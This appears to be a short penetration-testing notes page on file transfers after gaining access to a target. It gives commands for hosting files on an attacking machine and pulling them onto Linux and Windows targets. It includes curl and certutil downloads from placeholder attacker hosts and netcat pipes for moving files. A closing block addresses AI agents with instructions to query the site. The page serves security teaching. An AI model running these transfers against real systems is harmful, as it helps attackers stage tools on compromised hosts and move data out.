# File transfers

Once we gain initial access to our target we may need to upload additional tools to help us elevate privileges or provide easier methods of accessing the machine at a later point.  We might also want to download files from the target for use in our report.  The following list provides a few common techniques for executing file transfers.

### Hosting files via HTTP

On our attacking machine we have two options for serving files.  The first (preferred) method is to run the SimpleHTTPServer Python module in the directory that contains the files we want to transfer.

```
python3 -m http.server 80
python -m SimpleHTTPServer 80
```

Our second option is to use our built in Apache server.  To do this we need start the Apache 2 service.  Once started our files will be served from var/www/html.

```
systemctl start Apache2 
```

Next, we use our target machine to request the desired filed from the server.  The method varies slightly depending on the OS of the target machine.

### **Built-in OS functions**

#### **Linux**

```
wget http://sample.com/file.pdf
wget -O report_wget.pdf https://sample.com/report-2013.pdf
    -O saves the file with a different name on the local machine
curl -o file.pdf http://attackerip/file.pdf
axel -a -n 20 -o report_axel.pdf https://sample.com/report.pdf
    -n --used to specify the number of connections
    -a --provides a more concise progress indicator
    -o --used to specify a different name for the downloaded file
```

#### **Windows**

```
certutil -urlcache -f http://sourceip/file.exe [c:\desired_destination\desired_]name.exe
```

### Other alternatives

#### FTP

Create an FTP server in the directory you are in, on port 21, allow anonymous access:

```
Python -m pyftpdlib 21
ftp $IPaddressofattacker
```

#### Netcat

On receiving machine: `nc -nlvp 4444 > incoming.exe`

On sending machine: `nc – nv 10.11.23.33 4444 < file.exe`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.oncyberwar.com/5.-maintaining-access/file-transfers.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.